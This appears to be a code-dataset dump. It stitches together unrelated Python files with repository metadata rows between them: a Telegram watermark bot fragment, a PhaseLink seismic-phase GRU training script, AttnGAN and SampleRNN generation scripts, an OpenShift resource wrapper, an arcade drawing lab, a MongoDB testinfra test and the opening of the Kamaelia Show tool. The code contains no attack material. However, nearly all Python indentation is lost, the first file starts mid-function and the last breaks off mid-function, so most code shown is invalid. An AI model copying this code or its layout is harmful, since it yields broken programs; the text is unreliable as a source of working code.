# TODO: if the pos args are empty, ask a follow-up question to get user input of standard positions (TOP/BOTTOM ...)
# specific pos must be supplied thru args
global X_OFF, Y_OFF
X_OFF, Y_OFF = pos_arg.split('*')
await event.respond(f'X_OFF = {X_OFF} and Y_OFF = {Y_OFF}')
finally:
raise events.StopPropagation
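# Minimal sketch of the offset parsing done by set_pos above; the command text
# and helper name are hypothetical, for illustration only.
def _setpos_parse_demo():
    pos_arg = '40*30'                   # what get_args would return for "/setpos 40*30"
    x_off, y_off = pos_arg.split('*')   # -> ('40', '30'); both values remain strings
    return x_off, y_off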
async def watermarker(event):
# TODO: reject large files (above certain file limit)
# TODO: also watermark photos
if event.gif or event.video:
mp4_file = await event.download_media('')
# TODO: suffix the downloaded media with time-stamp and user id
outf = watermark(mp4_file, X_OFF, Y_OFF)
print(outf)
await event.client.send_file(event.sender_id, outf)
os.remove(mp4_file)
os.remove(outf)
# TODO: fetch information about bot name
# TODO: set the bot commands
# client(functions.bots.SetBotCommandsRequest(
# commands=[types.BotCommand(
# command='some string here',
# description='some string here'
# )]
# ))
# client.run_until_disconnected()
ALL_EVENTS = {
'start': (start, events.NewMessage(pattern='/start')),
'help': (bot_help, events.NewMessage(pattern='/help')),
'set_image': (set_image, events.NewMessage(pattern='/setimg')),
'set_pos': (set_pos, events.NewMessage(pattern='/setpos')),
'watermarker': (watermarker, events.NewMessage())
}
# This is a dictionary where the keys are the unique string identifiers for the events
# and the values are tuples consisting of the callback function and the event.
| 30.652174
| 121
| 0.684043
|
ad0e82216ee48bac4b6fac602fb1d3cac8949b48
| 15,294
|
py
|
Python
|
phaselink_train.py
|
TomSHudson/PhaseLink
|
04ad6e4b1c1c1ec809efb706f20a2702f04a6923
|
[
"MIT"
] | 2
|
2021-09-30T12:18:53.000Z
|
2021-10-01T02:32:40.000Z
|
phaselink_train.py
|
TomSHudson/PhaseLink
|
04ad6e4b1c1c1ec809efb706f20a2702f04a6923
|
[
"MIT"
] | null | null | null |
phaselink_train.py
|
TomSHudson/PhaseLink
|
04ad6e4b1c1c1ec809efb706f20a2702f04a6923
|
[
"MIT"
] | 1
|
2021-09-30T12:28:45.000Z
|
2021-09-30T12:28:45.000Z
|
#!/usr/bin/python
#-----------------------------------------------------------------------------------------------------------------------------------------
# PhaseLink: Earthquake phase association with deep learning
# Author: Zachary E. Ross
# Seismological Laboratory
# California Institute of Technology
# Script Description:
# Script to train a stacked bidirectional GRU model to link phases together. This code takes the synthetic training dataset produced using
# phaselink_dataset and trains a deep neural network to associate individual phases into events.
# Usage:
# python phaselink_train.py config_json
# For example: python phaselink_train.py params.json
#-----------------------------------------------------------------------------------------------------------------------------------------
# Import neccessary modules:
import numpy as np
import os
import torch
import torch.utils.data
import sys
import json
import pickle
import glob
import gc
import matplotlib.pyplot as plt
from torch.utils.data.sampler import SubsetRandomSampler
#----------------------------------------------- Define main functions -----------------------------------------------
class MyDataset(torch.utils.data.Dataset):
"""Function to preprocess a dataset into the format required by
pytorch for training."""
def __init__(self, data, target, device, transform=None):
self.data = torch.from_numpy(data).float().to(device)
self.target = torch.from_numpy(target).short().to(device)
self.transform = transform
def __getitem__(self, index):
x = self.data[index]
y = self.target[index]
if self.transform:
x = self.transform(x)
return x, y
def __len__(self):
return len(self.data)
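# Minimal usage sketch of MyDataset; the helper name, array shapes and the CPU
# device are assumptions for illustration (the real script loads X and Y from
# the .npy files named in the params file).
def _mydataset_demo():
    X_demo = np.zeros((4, 10, 5), dtype=np.float32)   # 4 sequences, 10 picks, 5 features
    Y_demo = np.zeros((4, 10), dtype=np.int16)        # per-pick labels
    demo_ds = MyDataset(X_demo, Y_demo, torch.device("cpu"))
    return demo_ds[0]                                 # (x, y) tensors already on the device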
class StackedGRU(torch.nn.Module):
"""Class defining the stacked bidirectional GRU network."""
def __init__(self):
super(StackedGRU, self).__init__()
self.hidden_size = 128
self.fc1 = torch.nn.Linear(5, 32)
self.fc2 = torch.nn.Linear(32, 32)
self.fc3 = torch.nn.Linear(32, 32)
self.fc4 = torch.nn.Linear(32, 32)
self.fc5 = torch.nn.Linear(32, 32)
self.fc6 = torch.nn.Linear(2*self.hidden_size, 1)
self.gru1 = torch.nn.GRU(32, self.hidden_size, \
batch_first=True, bidirectional=True)
self.gru2 = torch.nn.GRU(self.hidden_size*2, self.hidden_size, \
batch_first=True, bidirectional=True)
def forward(self, inp):
out = self.fc1(inp)
out = torch.nn.functional.relu(out)
out = self.fc2(out)
out = torch.nn.functional.relu(out)
out = self.fc3(out)
out = torch.nn.functional.relu(out)
out = self.fc4(out)
out = torch.nn.functional.relu(out)
out = self.fc5(out)
out = torch.nn.functional.relu(out)
out = self.gru1(out)
h_t = out[0]
out = self.gru2(h_t)
h_t = out[0]
out = self.fc6(h_t)
#out = torch.sigmoid(out)
return out
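# Shape sketch for the network above; the helper name, batch size and sequence
# length are arbitrary illustrations (5 is the per-pick feature count expected by fc1).
def _stackedgru_shape_demo():
    demo_net = StackedGRU()
    demo_in = torch.zeros(2, 7, 5)      # (batch, n_picks, 5 input features)
    return demo_net(demo_in).shape      # -> torch.Size([2, 7, 1]), one logit per pick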
class Model():
"""Class to create and train a bidirectional GRU model."""
def __init__(self, network, optimizer, model_path):
self.network = network
self.optimizer = optimizer
self.model_path = model_path
def train(self, train_loader, val_loader, n_epochs, enable_amp=False):
"""Function to perform the training of a bidirectional GRU model.
Loads and trains the data."""
from torch.autograd import Variable
import time
if enable_amp:
import apex.amp as amp
#pos_weight = torch.ones([1]).to(device)*24.264966334432359
#loss = torch.nn.BCEWithLogitsLoss(pos_weight=pos_weight)
loss = torch.nn.BCEWithLogitsLoss()
#loss = torch.nn.BCELoss()
n_batches = len(train_loader)
training_start_time = time.time()
for epoch in range(n_epochs):
running_loss = 0.0
running_acc = 0
running_val_acc = 0
print_every = n_batches // 10
start_time = time.time()
total_train_loss = 0
total_val_loss = 0
total_val_acc = 0
running_sample_count = 0
for i, data in enumerate(train_loader, 0):
# Get inputs/outputs and wrap in variable object
inputs, labels = data
#inputs = inputs.to(device)
#labels = labels.to(device)
# Set gradients for all parameters to zero
self.optimizer.zero_grad()
# Forward pass
outputs = self.network(inputs)
# Backward pass
outputs = outputs.view(-1)
labels = labels.view(-1)
if enable_amp:
loss_ = loss(outputs, labels.float())
with amp.scale_loss(loss_, self.optimizer) as loss_value:
loss_value.backward()
else:
loss_value = loss(outputs, labels.float())
loss_value.backward()
# Update parameters
self.optimizer.step()
with torch.no_grad():
# Print statistics
running_loss += loss_value.data.item()
total_train_loss += loss_value.data.item()
# Calculate categorical accuracy
pred = torch.round(torch.sigmoid(outputs)).short()
running_acc += (pred == labels).sum().item()
running_sample_count += len(labels)
# Print every 10th batch of an epoch
if (i + 1) % (print_every + 1) == 0:
print("Epoch {}, {:d}% \t train_loss: {:.4e} "
"train_acc: {:4.2f}% took: {:.2f}s".format(
epoch + 1, int(100 * (i + 1) / n_batches),
running_loss / print_every,
100*running_acc / running_sample_count,
time.time() - start_time))
# Reset running loss and time
running_loss = 0.0
start_time = time.time()
running_sample_count = 0
y_pred_all, y_true_all = [], []
prec_0 = 0
prec_n_0 = 0
prec_1 = 0
prec_n_1 = 0
reca_0 = 0
reca_n_0 = 0
reca_1 = 0
reca_n_1 = 0
pick_precision = 0
pick_recall = 0
with torch.no_grad():
for inputs, labels in val_loader:
# Wrap tensors in Variables
#inputs = inputs.to(device)
#labels = labels.to(device)
# Forward pass only
val_outputs = self.network(inputs)
val_outputs = val_outputs.view(-1)
labels = labels.view(-1)
val_loss = loss(val_outputs, labels.float())
total_val_loss += val_loss.data.item()
# Calculate categorical accuracy
y_pred = torch.round(torch.sigmoid(val_outputs)).short()
running_val_acc += (y_pred == labels).sum().item()
running_sample_count += len(labels)
#y_pred_all.append(pred.cpu().numpy().flatten())
#y_true_all.append(labels.cpu().numpy().flatten())
y_true = labels
# Get precision-recall for current validation epoch:
prec_0 += (
y_pred[y_pred<0.5] == y_true[y_pred<0.5]
).sum().item()
prec_1 += (
y_pred[y_pred>0.5] == y_true[y_pred>0.5]
).sum().item()
reca_0 += (
y_pred[y_true<0.5] == y_true[y_true<0.5]
).sum().item()
reca_1 += (
y_pred[y_true>0.5] == y_true[y_true>0.5]
).sum().item()
prec_n_0 += torch.numel(y_pred[y_pred<0.5])
prec_n_1 += torch.numel(y_pred[y_pred>0.5])
reca_n_0 += torch.numel(y_true[y_true<0.5])
reca_n_1 += torch.numel(y_true[y_true>0.5])
# Check if any are zero, and if so, set to 1 sample, simply so it doesn't crash:
# (Note: this only affects the printed output)
if prec_n_0 == 0:
prec_n_0 = 1
if prec_n_1 == 0:
prec_n_1 = 1
if reca_n_0 == 0:
reca_n_0 = 1
if reca_n_1 == 0:
reca_n_1 = 1
print("Precision (Class 0): {:4.3f}".format(prec_0/prec_n_0))
print("Recall (Class 0): {:4.3f}".format(reca_0/reca_n_0))
print("Precision (Class 1): {:4.3f}".format(prec_1/prec_n_1))
print("Recall (Class 1): {:4.3f}".format(reca_1/reca_n_1))
#y_pred_all = np.concatenate(y_pred_all)
#y_true_all = np.concatenate(y_true_all)
#from sklearn.metrics import classification_report
#print(classification_report(y_true_all, y_pred_all))
total_val_loss /= len(val_loader)
total_val_acc = running_val_acc / running_sample_count
print(
"Validation loss = {:.4e} acc = {:4.2f}%".format(
total_val_loss,
100*total_val_acc))
# Save model:
os.makedirs(self.model_path, exist_ok=True)
torch.save({
'epoch': epoch,
'model_state_dict': self.network.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
'loss': total_val_loss,
}, '%s/model_%03d_%f.pt' % (self.model_path, epoch, total_val_loss))
print(
"Training finished, took {:.2f}s".format(
time.time() -
training_start_time))
def predict(self, data_loader):
from torch.autograd import Variable
import time
for inputs, labels in data_loader:
# Wrap tensors in Variables
inputs, labels = Variable(
inputs.to(device)), Variable(
labels.to(device))
# Forward pass only
val_outputs = self.network(inputs)
def find_best_model(model_path="phaselink_model"):
"""Function to find best model.
Note: Currently uses a very basic selection method."""
# Plot model training and validation loss to select best model:
# Write the models loss function values to file:
models_fnames = list(glob.glob(os.path.join(model_path, "model_???_*.pt")))
models_fnames.sort()
val_losses = []
f_out = open(os.path.join(model_path, 'val_losses.txt'), 'w')
for model_fname in models_fnames:
model_curr = torch.load(model_fname)
val_losses.append(model_curr['loss'])
f_out.write(' '.join((model_fname, str(model_curr['loss']), '\n')))
del(model_curr)
gc.collect()
f_out.close()
val_losses = np.array(val_losses)
print("Written losses to file: ", os.path.join(model_path, 'val_losses.txt'))
# And select approximate best model (approx corner of loss curve):
approx_corner_idx = np.argwhere(val_losses < np.average(val_losses))[0][0]
print("Model to use:", models_fnames[approx_corner_idx])
# And plot:
plt.figure()
plt.plot(np.arange(len(val_losses)), val_losses)
plt.hlines(val_losses[approx_corner_idx], 0, len(val_losses), color='r', ls="--")
plt.ylabel("Val loss")
plt.xlabel("Epoch")
plt.show()
# And convert model to use to universally usable format (GPU or CPU):
model = StackedGRU().cuda(device)
checkpoint = torch.load(models_fnames[approx_corner_idx], map_location=device)
model.load_state_dict(checkpoint['model_state_dict'])
torch.save(model, os.path.join(model_path, 'model_to_use.gpu.pt'), _use_new_zipfile_serialization=False)
new_device = "cpu"
model = model.to(new_device)
torch.save(model, os.path.join(model_path, 'model_to_use.cpu.pt'), _use_new_zipfile_serialization=False)
del model
gc.collect()
print("Found best model and written out to", model_path, "for GPU and CPU.")
#----------------------------------------------- End: Define main functions -----------------------------------------------
#----------------------------------------------- Run script -----------------------------------------------
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python phaselink_train.py config_json")
print("E.g. python phaselink_train.py params.json")
sys.exit()
with open(sys.argv[1], "r") as f:
params = json.load(f)
# Get device (cpu vs gpu) specified:
device = torch.device(params["device"])
if params["device"][0:4] == "cuda":
torch.cuda.empty_cache()
enable_amp = True
else:
enable_amp = False
if enable_amp:
import apex.amp as amp
# Get training info from param file:
n_epochs = params["n_epochs"] #100
# Load in training dataset:
X = np.load(params["training_dset_X"])
Y = np.load(params["training_dset_Y"])
print("Training dataset info:")
print("Shape of X:", X.shape, "Shape of Y", Y.shape)
dataset = MyDataset(X, Y, device)
# Get dataset info:
n_samples = len(dataset)
indices = list(range(n_samples))
# Set size of training and validation subset:
n_test = int(0.1*X.shape[0])
validation_idx = np.random.choice(indices, size=n_test, replace=False)
train_idx = list(set(indices) - set(validation_idx))
# Specify samplers:
train_sampler = SubsetRandomSampler(train_idx)
validation_sampler = SubsetRandomSampler(validation_idx)
# Load training data:
train_loader = torch.utils.data.DataLoader(
dataset,
batch_size=256,
shuffle=False,
sampler=train_sampler
)
val_loader = torch.utils.data.DataLoader(
dataset,
batch_size=1024,
shuffle=False,
sampler=validation_sampler
)
stackedgru = StackedGRU()
stackedgru = stackedgru.to(device)
#stackedgru = torch.nn.DataParallel(stackedgru,
# device_ids=['cuda:2', 'cuda:3', 'cuda:4', 'cuda:5'])
if enable_amp:
#amp.register_float_function(torch, 'sigmoid')
from apex.optimizers import FusedAdam
optimizer = FusedAdam(stackedgru.parameters())
stackedgru, optimizer = amp.initialize(
stackedgru, optimizer, opt_level='O2')
else:
optimizer = torch.optim.Adam(stackedgru.parameters())
model = Model(stackedgru, optimizer, model_path='./phaselink_model')
print("Begin training process.")
model.train(train_loader, val_loader, n_epochs, enable_amp=enable_amp)
# And select and assign best model:
find_best_model(model_path="phaselink_model")
print("Finished.")
| 37.121359
| 140
| 0.55172
|
9ce6c2eca44ea0e93c8984d72cabb25135bde838
| 1,329
|
py
|
Python
|
simple.py
|
agermanidis/attngan
|
5e763da632a307be28656573b69b28d234eb6d99
|
[
"MIT"
] | 1
|
2020-08-16T10:07:06.000Z
|
2020-08-16T10:07:06.000Z
|
simple.py
|
agermanidis/attngan
|
5e763da632a307be28656573b69b28d234eb6d99
|
[
"MIT"
] | 2
|
2020-07-23T19:25:43.000Z
|
2020-07-24T21:21:08.000Z
|
simple.py
|
agermanidis/attngan
|
5e763da632a307be28656573b69b28d234eb6d99
|
[
"MIT"
] | 1
|
2020-07-22T18:26:37.000Z
|
2020-07-22T18:26:37.000Z
|
import os
import argparse
import time
import random
from eval import *
from miscc.config import cfg, cfg_from_file
import warnings
warnings.filterwarnings("ignore")
def parse_args():
parser = argparse.ArgumentParser(description='Train a AttnGAN network')
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default='cfg/bird_attn2.yml', type=str)
parser.add_argument('--gpu', dest='gpu_id', type=int, default=-1)
parser.add_argument('--data_dir', dest='data_dir', type=str, default='')
parser.add_argument('--manualSeed', type=int, help='manual seed')
args = parser.parse_args()
return args
if __name__ == '__main__':
print('Running Simple Inference')
# gpu based
args = parse_args()
cfg_from_file(args.cfg_file)
cfg.CUDA = True
# load word dictionaries
wordtoix, ixtoword = word_index()
# load models
print('Loading Model...')
text_encoder, netG = models(len(wordtoix))
print('Models Loaded')
seed = 100
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if cfg.CUDA:
torch.cuda.manual_seed_all(seed)
caption = 'a green field with trees and mountain in the back'
im = generate(caption, wordtoix, ixtoword, text_encoder, netG, False)
name = 'RESULT.png'
im.save(name, format="png")
print('Done!')
| 30.204545
| 73
| 0.702032
|
c27d78b2c00680c6ead601a6304b59698de7cbcb
| 2,870
|
py
|
Python
|
ocp_resources/catalog_source_config.py
|
mguetta1/openshift-python-wrapper
|
007ff36aab0f9f87c672db6107a2dd5b5618613b
|
[
"Apache-2.0"
] | null | null | null |
ocp_resources/catalog_source_config.py
|
mguetta1/openshift-python-wrapper
|
007ff36aab0f9f87c672db6107a2dd5b5618613b
|
[
"Apache-2.0"
] | null | null | null |
ocp_resources/catalog_source_config.py
|
mguetta1/openshift-python-wrapper
|
007ff36aab0f9f87c672db6107a2dd5b5618613b
|
[
"Apache-2.0"
] | null | null | null |
import logging
from ocp_resources.constants import PROTOCOL_ERROR_EXCEPTION_DICT, TIMEOUT_4MINUTES
from ocp_resources.resource import NamespacedResource
from ocp_resources.utils import TimeoutExpiredError, TimeoutSampler
LOGGER = logging.getLogger(__name__)
class CatalogSourceConfig(NamespacedResource):
api_group = NamespacedResource.ApiGroup.OPERATORS_COREOS_COM
def __init__(
self,
name=None,
namespace=None,
source=None,
target_namespace=None,
packages=None,
cs_display_name=None,
cs_publisher=None,
client=None,
teardown=True,
yaml_file=None,
delete_timeout=TIMEOUT_4MINUTES,
):
super().__init__(
name=name,
namespace=namespace,
client=client,
teardown=teardown,
yaml_file=yaml_file,
delete_timeout=delete_timeout,
)
self.source = source
self.target_namespace = target_namespace
self.packages = packages
self.cs_display_name = cs_display_name
self.cs_publisher = cs_publisher
def to_dict(self):
res = super().to_dict()
if self.yaml_file:
return res
res.update(
{
"spec": {
"source": self.source,
"targetNamespace": self.target_namespace,
"packages": self.packages,
"csDisplayName": self.cs_display_name,
"csPublisher": self.cs_publisher,
}
}
)
return res
def wait_for_csc_status(self, status, timeout=120):
"""
Wait for CatalogSourceConfig to reach requested status.
CatalogSourceConfig Status is found under currentPhase.phase.
Example phase: {'message': 'The object has been successfully reconciled', 'name': 'Succeeded'}
Raises:
TimeoutExpiredError: If CatalogSourceConfig in not in desire status.
"""
samples = TimeoutSampler(
wait_timeout=timeout,
sleep=1,
exceptions_dict=PROTOCOL_ERROR_EXCEPTION_DICT,
func=self.api.get,
field_selector=f"metadata.name=={self.name}",
namespace=self.namespace,
)
current_status = None
try:
for sample in samples:
if sample.items:
sample_status = sample.items[0].status
if sample_status:
current_status = sample_status.currentPhase.phase["name"]
if current_status == status:
return
except TimeoutExpiredError:
if current_status:
LOGGER.error(f"Status of {self.kind} {self.name} is {current_status}")
raise
| 31.195652
| 102
| 0.581533
|
651767a2c488e43b3d6628767c855d37a8fc21db
| 4,679
|
py
|
Python
|
generate.py
|
mangtronix/samplernn-pytorch
|
101d618f82fcb1ff48914297107eb87a822f3f5e
|
[
"MIT"
] | 1
|
2020-11-19T08:32:07.000Z
|
2020-11-19T08:32:07.000Z
|
generate.py
|
mangtronix/samplernn-pytorch
|
101d618f82fcb1ff48914297107eb87a822f3f5e
|
[
"MIT"
] | null | null | null |
generate.py
|
mangtronix/samplernn-pytorch
|
101d618f82fcb1ff48914297107eb87a822f3f5e
|
[
"MIT"
] | null | null | null |
from model import SampleRNN
import torch
from collections import OrderedDict
import os
import json
from trainer.plugins import GeneratorPlugin
import glob
import sys
'''Other comments: https://github.com/deepsound-project/samplernn-pytorch/issues/8'''
# Support some command line options
# Added by Mangtronix
# Michael Ang - https://michaelang.com
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-d', '--dataset', help="Dataset name, e.g. 'lofi'")
parser.add_option('-l', '--length', help="Length of audio to generate in seconds", default=30)
parser.add_option('-c', '--checkpoint', help="Checkpoint name ('latest','best', or explicit name)", default='latest')
parser.add_option('-o', '--output', help="Output file name")
(options, args) = parser.parse_args()
if not options.dataset:
parser.print_help()
sys.exit(-1)
def find_results_path(dataset_name):
paths = glob.glob('results/*' + dataset_name)
if len(paths) < 1:
print("No results found for " + dataset_name)
raise("dataset not found")
return paths[0] + '/'
def find_latest_checkpoint(results_path):
files = glob.glob(results_path + "checkpoints/*")
latest_file = max(files, key=os.path.getctime)
return latest_file
def find_best_checkpoint(results_path):
files = glob.glob(results_path + "checkpoints/best*")
return files[-1]
def find_checkpoint(results_path, checkpoint_name):
if checkpoint_name == 'best':
return find_best_checkpoint(results_path)
if checkpoint_name == 'latest':
return find_latest_checkpoint(results_path)
return results_path + "checkpoints/" + checkpoint_name
def get_checkpoint_name(checkpoint_path):
return os.path.basename(os.path.normpath(checkpoint_path))
RESULTS_PATH=find_results_path(options.dataset)
print("Using dataset at %s" % RESULTS_PATH)
PRETRAINED_PATH = find_checkpoint(RESULTS_PATH, options.checkpoint)
print("Using checkpoint %s" % PRETRAINED_PATH)
CHECKPOINT_NAME = get_checkpoint_name(PRETRAINED_PATH)
print("Checkpoint name is %s" % CHECKPOINT_NAME)
OUTPUT_NAME = options.dataset + "_" + CHECKPOINT_NAME
# Paths
#RESULTS_PATH = 'results/exp:TEST-frame_sizes:16,4-n_rnn:2-dataset:COGNIMUSE_eq_eq_pad/'
#RESULTS_PATH = 'results/exp:lofi-frame_sizes:16,4-n_rnn:2-dataset:lofi/'
#PRETRAINED_PATH = RESULTS_PATH + 'checkpoints/best-ep11-it2750'
#PRETRAINED_PATH = RESULTS_PATH + 'checkpoints/best-ep65-it79431'
# RESULTS_PATH = 'results/exp:TEST-frame_sizes:16,4-n_rnn:2-dataset:piano3/'
# PRETRAINED_PATH = RESULTS_PATH + 'checkpoints/best-ep21-it29610'
GENERATED_PATH = RESULTS_PATH + 'generated/'
if not os.path.exists(GENERATED_PATH):
os.mkdir(GENERATED_PATH)
# Load model parameters from .json for audio generation
params_path = RESULTS_PATH + 'sample_rnn_params.json'
with open(params_path, 'r') as fp:
params = json.load(fp)
# Create model with same parameters as used in training
model = SampleRNN(
frame_sizes=params['frame_sizes'],
n_rnn=params['n_rnn'],
dim=params['dim'],
learn_h0=params['learn_h0'],
q_levels=params['q_levels'],
weight_norm=params['weight_norm']
)
#model = model.cuda()
# Delete "model." from key names since loading the checkpoint automatically attaches it to the key names
pretrained_state = torch.load(PRETRAINED_PATH)
new_pretrained_state = OrderedDict()
for k, v in pretrained_state.items():
layer_name = k.replace("model.", "")
new_pretrained_state[layer_name] = v
# print("k: {}, layer_name: {}, v: {}".format(k, layer_name, np.shape(v)))
# Load pretrained model
model.load_state_dict(new_pretrained_state)
# Generate Plugin
num_samples = 1 # params['n_samples']
sample_length = params['sample_length']
sample_rate = params['sample_rate']
sampling_temperature = params['sampling_temperature']
# Override from our options
sample_length = sample_rate * int(options.length)
print("Number samples: {}, sample_length: {}, sample_rate: {}".format(num_samples, sample_length, sample_rate))
print("Generating %d seconds of audio" % (sample_length / sample_rate))
generator = GeneratorPlugin(GENERATED_PATH, num_samples, sample_length, sample_rate, sampling_temperature)
# Call new register function to accept the trained model and the cuda setting
generator.register_generate(model.cuda(), params['cuda'])
# Generate new audio
# $$$ check if we already have generated audio and increment the file name
generator.epoch(OUTPUT_NAME)
GENERATED_FILEPATH = GENERATED_PATH + "ep" + OUTPUT_NAME + "-s1.wav"
print("Saved audio to %s " % GENERATED_FILEPATH)
if options.output:
print("Moving to %s" % options.output)
os.rename(GENERATED_FILEPATH, options.output)
| 35.44697
| 117
| 0.748664
|
5bf4a6a344dff56744e26cdc8b43558e9ab4afbf
| 3,504
|
py
|
Python
|
lab6/lab6.py
|
sydneysmartin/csc121
|
6ef4d323f58f4177c46b5ea38db7bc95a06d865e
|
[
"CC0-1.0"
] | null | null | null |
lab6/lab6.py
|
sydneysmartin/csc121
|
6ef4d323f58f4177c46b5ea38db7bc95a06d865e
|
[
"CC0-1.0"
] | null | null | null |
lab6/lab6.py
|
sydneysmartin/csc121
|
6ef4d323f58f4177c46b5ea38db7bc95a06d865e
|
[
"CC0-1.0"
] | null | null | null |
import arcade
def draw_section_outlines():
color = arcade.color.BLACK
# Draw squares on bottom
arcade.draw_rectangle_outline(150, 150, 300, 300, color)
arcade.draw_rectangle_outline(450, 150, 300, 300, color)
arcade.draw_rectangle_outline(750, 150, 300, 300, color)
arcade.draw_rectangle_outline(1050, 150, 300, 300, color)
#Draw squares on top
arcade.draw_rectangle_outline(150, 450, 300, 300, color)
arcade.draw_rectangle_outline(450, 450, 300, 300, color)
arcade.draw_rectangle_outline(750, 450, 300, 300, color)
arcade.draw_rectangle_outline(1050, 450, 300, 300, color)
def draw_section_1():
for row in range(30):
for column in range(30):
x = (column * 10) + 5
y = (row *10) + 5
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def draw_section_2():
for row in range(30):
for column in range(30):
x = 300 + (10 * column) + 5
y = (10 * row) + 5
if row % 2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
def draw_section_3():
for row in range (30):
for column in range(30):
x = 600 + (10 * column) + 5
y = (10 * row) + 5
if column % 2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
def draw_section_4():
for row in range (30):
for column in range(30):
x = 900 + (10 * row) + 5
y = (10 * column) + 5
if row % 2 == 1 or column % 2 == 1:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
elif row %2 == 0 and column%2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
def draw_section_5():
for column in range (30):
for row in range(column):
x = (10 * column) + 5
y = 300 + (10 * row) + 5
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def draw_section_6():
for row in range(30):
for column in range(30-row):
x = 300 + (10 * column) + 5
y = 300 + (10 * row) + 5
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def draw_section_7():
for row in range(30):
for column in range(row + 1):
x = 600 + (10 * column) + 5
y = 300 + (10 * row) + 5
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def draw_section_8():
for row in range(30):
for column in range(row):
x = 1200 + (column * (-10)) - 5
y = 300 + (10 * row) + 5
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def main():
arcade.open_window(1200, 600, "Lab 05 - Loopy Lab")
arcade.set_background_color(arcade.color.AIR_FORCE_BLUE)
arcade.start_render()
draw_section_outlines()
draw_section_1()
draw_section_2()
draw_section_3()
draw_section_4()
draw_section_5()
draw_section_6()
draw_section_7()
draw_section_8()
arcade.finish_render()
arcade.run()
if __name__ =='__main__':
main()
| 25.955556
| 76
| 0.558505
|
c448f209646c66de5b815220e02f7f72ed85814d
| 636
|
py
|
Python
|
ansible/roles/db/molecule/default/tests/test_default.py
|
otus-devops-2019-02/artem198315_infra
|
1d052b8c2d15b0b1a69d863de1636c630a4bfde7
|
[
"MIT"
] | null | null | null |
ansible/roles/db/molecule/default/tests/test_default.py
|
otus-devops-2019-02/artem198315_infra
|
1d052b8c2d15b0b1a69d863de1636c630a4bfde7
|
[
"MIT"
] | null | null | null |
ansible/roles/db/molecule/default/tests/test_default.py
|
otus-devops-2019-02/artem198315_infra
|
1d052b8c2d15b0b1a69d863de1636c630a4bfde7
|
[
"MIT"
] | null | null | null |
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
# check if MongoDB is enabled and running
def test_mongo_running_and_enabled(host):
mongo = host.service("mongod")
assert mongo.is_running
assert mongo.is_enabled
# check if configuration file contains the required line
def test_config_file(host):
config_file = host.file('/etc/mongod.conf')
assert config_file.contains('bindIp: 0.0.0.0')
assert config_file.is_file
def test_socket(host):
assert host.socket('tcp://0.0.0.0:27017').is_listening
| 27.652174
| 63
| 0.778302
|
1a609df3e11235af02c9be0ee1eb1221e1c146a8
| 7,334
|
py
|
Python
|
Sketches/MPS/BugReports/FixTests/Kamaelia/Tools/Show.py
|
sparkslabs/kamaelia_orig
|
24b5f855a63421a1f7c6c7a35a7f4629ed955316
|
[
"Apache-2.0"
] | 12
|
2015-10-20T10:22:01.000Z
|
2021-07-19T10:09:44.000Z
|
Sketches/MPS/BugReports/FixTests/Kamaelia/Tools/Show.py
|
sparkslabs/kamaelia_orig
|
24b5f855a63421a1f7c6c7a35a7f4629ed955316
|
[
"Apache-2.0"
] | 2
|
2015-10-20T10:22:55.000Z
|
2017-02-13T11:05:25.000Z
|
Sketches/MPS/BugReports/FixTests/Kamaelia/Tools/Show.py
|
sparkslabs/kamaelia_orig
|
24b5f855a63421a1f7c6c7a35a7f4629ed955316
|
[
"Apache-2.0"
] | 6
|
2015-03-09T12:51:59.000Z
|
2020-03-01T13:06:21.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
#
import os
import sys
import pygame
import Axon
from Kamaelia.UI.Pygame.Button import Button
from Kamaelia.UI.Pygame.Multiclick import Multiclick
from Kamaelia.UI.Pygame.Image import Image
from Kamaelia.Visualisation.PhysicsGraph.chunks_to_lines import chunks_to_lines
from Kamaelia.Visualisation.PhysicsGraph.lines_to_tokenlists import lines_to_tokenlists
from Kamaelia.Visualisation.PhysicsGraph.TopologyViewer import TopologyViewer
from Kamaelia.Util.Chooser import Chooser
from Kamaelia.Chassis.Graphline import Graphline
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.File.ReadFileAdaptor import ReadFileAdaptor
from Kamaelia.UI.Pygame.KeyEvent import KeyEvent
# We should start thinking about how we handle the lines below better:
from Kamaelia.Apps.Show.GraphSlides import onDemandGraphFileParser_Prefab
if len(sys.argv) > 1:
basepath = sys.argv[1]
else:
basepath = "WhatIsShow.show"
GraphsFile = os.path.join(basepath, "Graphs.xml")
path = os.path.join(basepath, "Slides")
path_extra = os.path.join(basepath, "SecondarySlides")
extn = ".png"
def getSlideList(path, extn):
files = os.listdir(path)
